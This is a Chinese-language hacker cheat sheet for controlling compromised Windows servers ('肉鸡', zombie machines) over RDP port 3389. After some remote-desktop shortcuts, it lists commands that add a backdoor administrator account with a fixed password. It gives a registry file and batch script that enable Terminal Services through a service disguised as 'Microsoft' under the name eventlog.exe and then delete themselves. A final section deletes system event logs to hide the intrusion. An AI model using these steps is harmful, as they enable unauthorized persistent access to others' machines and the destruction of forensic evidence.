3389肉鸡快捷键
CTRL+ALT+END把“任务管理器”抓出来
CTRL+ALT+BREAK这个就是切换全屏显示。
CTRL+ALT+END打开“Windows安全”对话框。
ALT+PAGEUP从左向右在程序之间切换。
ALT+PAGEDOWN从右向左在程序之间切换。
ALT+INSERT按启动顺序来回切换程序。
ALT+HOME显示“开始”菜单。
CTRL+ALT+BREAK在窗口(如果适用)和全屏显示之间切换客户端。
ALT+DELETE显示窗口的弹出式菜单。
CTRL+ALT+减号(-)将客户端活动窗口的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下ALT+PrintScrn键时的功能相同)。
CTRL+ALT+加号(+)将整个客户端窗口区域的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下PrintScrn键时的功能相同)。
注意:
在NEC98计算机中,这些快捷键在以下两种情况下会有些不同:
CTRL+ALT+BREAK由F12键代替。
CTRL+ALT+END由F15键代替。
3389有关用户操作的基本命令
queryuser 查询登陆用户
logoff ID 蹬出某用户
netuser查看所有用户
netusertty3101506414/add添加一个用户,用户名tty310密码1506414
netlocalgroupadministratorstty310/add把tty310这个用户加到管理员组
netusertty310查看用户tty310的情况
netusertty31082073将用户tty310的密码更改为82073
netusertty310/delete 删除tty310
netusertty310/active:no 禁用该用户
netusertty310/active:yes启用该用户
开3389
3389.reg
WindowsRegistryEditorVersion5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002
[HKEY_USERS\.DEFAULT\KeyboardLayout\Toggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Deion"="Microsoft"
"DisplayName"="Microsoft"
3389.bat
copytermsrv.exeeventlog.exe
regedit.exe/s3389.reg
del3389.reg
del3389.exe
del3389.bat
重起
iisreset/reboot/timeout:00
reboot
删除日志
delC:\winnt\system32\logfiles\*.*
delC:\winnt\ssytem32\config\*.evt
delC:\winnt\system32\dtclog\*.*
delC:\winnt\system32\*.log
delC:\winnt\system32\*.txt
delC:\winnt\*.txt
delC:\winnt\*.log